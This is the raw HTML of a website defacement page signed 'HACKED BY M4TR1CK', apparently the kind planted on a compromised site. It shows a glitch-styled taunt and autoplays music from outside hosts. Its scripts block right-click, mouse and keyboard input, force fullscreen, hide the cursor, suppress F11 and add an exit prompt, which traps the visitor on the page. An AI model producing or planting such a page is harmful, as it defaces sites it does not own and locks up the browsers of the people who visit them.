<html>

    <!-- MAU MALING COK? -->
    <!-- HACKED BY M4TR1CK -->
  
    <head>
      <title>XI TKJ 1</title>
      <meta charset="UTF-8" />
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1" />
      <meta name="title" content="HCKD BYY M4TR1CK">
      <meta name="description" content="M4TR1CK">
      <meta name="robots" content="index, follow">
      <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
      <meta name="language" content="English">
      <meta name="revisit-after" content="60 days">
      <meta name="author" content="AmmarBN">
      <meta property="og:image" content="https://i.ibb.co/ZgJ8Q5z/IMG-20221104-WA0158.jpg">
      <meta name="theme-color" content="#000">
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
      <link rel="shortcut icon" href="https://cdn.prinsh.com/data-1/images/NathanPrinsley-gerryspongebob.gif" />
      <link rel="apple-touch-icon" href="https://cdn.prinsh.com/data-1/images/NathanPrinsley-gerryspongebob.gif" />

      

 <style type='text/css'>

*{margin:0;padding:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box;box-sizing:border-box}body,html{margin:0;padding:0;font:16px/1.4 Lato,sans-serif;color:#fefeff;-webkit-font-smoothing:antialiased;font-smoothing:antialiased;font-family:Comic Sans MS}body{background:#080510;-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}h1{font:2.75em solsticeofsuffering,serif;font-weight:400;letter-spacing:.35em;text-shadow:0 0 25px rgba(245, 0, 0, 1)}h2{font:1.45em solsticeofsuffering,serif;font-weight:400;letter-spacing:.5em;text-shadow:0 0 25px rgba(245, 0, 0, 1);text-transform:lowercase}[class^=letter]{-webkit-transition:opacity 3s ease;-moz-transition:opacity 3s ease;transition:opacity 3s ease}.letter-0{transition-delay:.2s}.letter-1{transition-delay:.4s}.letter-2{transition-delay:.6s}.letter-3{transition-delay:.8s}.letter-4{transition-delay:1s}.letter-5{transition-delay:1.2s}.letter-6{transition-delay:1.4s}.letter-7{transition-delay:1.6s}.letter-8{transition-delay:1.8s}.letter-9{transition-delay:2s}.letter-10{transition-delay:2.2s}.letter-11{transition-delay:2.4s}.letter-12{transition-delay:2.6s}.letter-13{transition-delay:2.8s}.letter-14{transition-delay:3s}h1,h2{visibility:hidden;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}h1.transition-in,h2.transition-in{visibility:visible}h1 [class^=letter],h2 [class^=letter]{opacity:0}h1.transition-in [class^=letter],h2.transition-in [class^=letter]{opacity:1}#container{display:table;position:absolute;z-index:20;width:100%;height:100%;text-align:center;cursor:none}#container>div{display:table-cell;vertical-align:middle}#container p{position:absolute;width:100%;left:0;bottom:25px;font-size:.8em;letter-spacing:.1em;font-weight:300;color:#76747a;-webkit-font-smoothing:subpixel-antialiased;font-smoothing:subpixel-antialiased}#container p strong{color:#b3abc5}#container p span{font-size:.75em;padding:0 2px}#canvas{position:absolute;z-index:10;top:0;left:0;width:100%;height:100%;cursor:none}#stats{position:absolute;z-index:10;left:10px;top:10px}.dg.ac{z-index:100!important}.STYLE4{color:#FFF}
</style>
<script type="text/javascript">
var uid = '154035';
var wid = '328457';
</script>
</head>
<style>body { scrollbar-track-color: #000000;scrollbar-darkshadow-color: #000000; scrollbar-face-color: #000000; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #000000;  scrollbar-arrow-color: #FFFFFF; color:#8E959E }
.name { text-decoration: none;}
@-moz-keyframes roll { 100% { -moz-transform: rotate(1440deg); } }
@-o-keyframes roll { 100% { -o-transform: rotate(1440deg); } }
@-webkit-keyframes roll { 100% { -webkit-transform: rotate(1440deg); } }
body{-moz-animation-name: roll;
-moz-animation-duration: 1.5s;
-moz-animation-iteration-count: 1;
-o-animation-name: roll;
-o-animation-duration: 1.5s;
-o-animation-iteration-count: 1;
-webkit-animation-name: roll;
-webkit-animation-duration: 3s;
-webkit-animation-iteration-count: 1;}
</style> 
<body>

    
      </style>
      <link rel="stylesheet" href="https://bit.ly/2UGCIC5">
    </head>
    <body bgcolor="black" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body" onload="typeWriter()">
      <style type="text/css">
       
       body{
  height: 100px;
  background-color: black;
  background-image: url('https://ibb.co/JqRhTXZ');
  background-repeat: no-repeat;
  background-attachment :fixed;
  background-size: contain;
  background-position: center;
}
        center {

      
          font-family: Courier;
        }
  
        img {
          opacity: 80%;
        }
  
        red {
          color: red;
        }
  
        #background-video {
          height: 100vh;
          width: 100vw;
          object-fit: cover;
          position: fixed;
          left: 0;
          right: 0;
          top: 0;
          bottom: 0;
          z-index: -1;
        }
  
        font {
          text-shadow: #000 0px 0px 3px;
          -webkit-font-smoothing: antialiased;
        }
  
        div {
          animation: glitch 1s linear infinite;
        }
  
        @keyframes glitch {
  
          2%,
          64% {
            transform: translate(2px, 0) skew(0deg);
          }
  
          4%,
          60% {
            transform: translate(-2px, 0) skew(0deg);
          }
  
          62% {
            transform: translate(0, 0) skew(5deg);
          }
        }
  
        div:before,
        div:after {
          content: attr(title);
          position: absolute;
          left: 0;
        }
  
        div:before {
          animation: glitchTop 1s linear infinite;
          clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
          -webkit-clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
        }
  
        @keyframes glitchTop {
  
          2%,
          64% {
            transform: translate(2px, -2px);
          }
  
          4%,
          60% {
            transform: translate(-2px, 2px);
          }
  
          62% {
            transform: translate(13px, -1px) skew(-13deg);
          }
        }
  
        div:after {
          animation: glitchBotom 1.5s linear infinite;
          clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
          -webkit-clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
        }
  
        @keyframes glitchBotom {
  
          2%,
          64% {
            transform: translate(-2px, 0);
          }
  
          4%,
          60% {
            transform: translate(-2px, 0);
          }
  
          62% {
            transform: translate(-22px, 5px) skew(21deg);
          }
        }
      </style>
      <script language="JavaScript">
        window.onbeforeunload = confirmExit;
  
        function confirmExit() {
          return "are you sure ? wkwk";
        }
  
        function fs() {
          var elem = document.documentElement;
          if (elem.requestFullscreen) {
            elem.requestFullscreen();
          } else if (elem.msRequestFullscreen) {
            elem.msRequestFullscreen();
          } else if (elem.mozRequestFullScreen) {
            elem.mozRequestFullScreen();
          } else if (elem.webkitRequestFullscreen) {
            elem.webkitRequestFullscreen();
          }
          document.getElementById("body").style.cursor = 'none';
          document.onkeydown = function(e) {
            return false;
          }
          document.addEventListener("keydown", e => {
            if (e.key == "F11") e.preventDefault();
          });
        }
      </script>
  <script id="rendered-js">
  document.addEventListener('DOMContentLoaded', function (event) {
    // array with texts to type in typewriter
    var dataText = ["kamunanyak?", "kamunanyak?", "kamunanyak?", "kamunanyak?", "kamunanyak?", "kamunanyak?"];
  
    // type one text in the typwriter
    // keeps calling itself until the text is finished
    function typeWriter(text, i, fnCallback) {
      // chekc if text isn't finished yet
      if (i < text.length) {
        // add next character to h1
  
        document.getElementById("hekerabies").innerHTML = text.substring(0, i + 1);
  
        // wait for a while and call this function again for next character
        setTimeout(function () {
          typeWriter(text, i + 1, fnCallback);
        }, 150);
      }
      // text finished, call callback if there is a callback function
      else if (typeof fnCallback == 'function') {
          // call callback after timeout
          setTimeout(fnCallback, 7000);
        }
    }
    // start a typewriter animation for a text in the dataText array
    function StartTextAnimation(i) {
      if (typeof dataText[i] == 'undefined') {
        setTimeout(function () {
          StartTextAnimation(0);
        }, 30000);
      }
      // check if dataText[i] exists
      if (i < dataText[i].length) {
        // text exists! start typewriter animation
        typeWriter(dataText[i], 0, function () {
          // after callback (and whole text has been animated), start next text
          StartTextAnimation(i + 1);
        });
      }
    }
    // start the text animation
    StartTextAnimation(0);
  });
  //# sourceURL=pen.js
      </script>
      <center>

        <style>
          button{
          font-family: Cambria, Cochin, Georgia, Times, 'Times New Roman', serif;
          font-size: 15px;
          background: #000000;
          color: rgb(114, 124, 123);
          border: rgb(66, 75, 75) 1px solid;
          border-radius: 190px;
          padding: 8px 20px;
          margin-top: 15px;
          }
          
          button:hover{
          opacity:0.9;
          }
          </style>

    
    

<video id="background-video" src="https://b.top4top.io/m_2511ugoz81.mp4" autoplay="" loop="" muted="" poster="data:image/png;base64, iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=">
    <source src="https://b.top4top.io/m_2511ugoz81.mp4" type="background-video">
</video>
      
      <table width="100%" height="80%">
        <td>

          <br>

            <script>

              <audio source="mp3" src="https://cdn.prinsh.com/data-1/mp3/dj-all-night-remix.mp3" type="audio/mp3" autoplay="autoplay"></audio>
              
              </script>
              
              <body style="color:#fff; margin:0;font: normal 14px/20px Share Tech Mono, Helvetica, sans-serif; height:100%; background-color:#000;" />
              
              <div style="height:auto; min-height:100%;">
              
              
            
         
              
              
          
</center>
          </center>

          
         
        <center>
          <audio source="mp3" src="https://b.top4top.io/m_2442ker5d0.mp3" type="audio/mp3" autoplay="autoplay"></audio>
        </center>
        <center>
            
        </td>
      </table>

     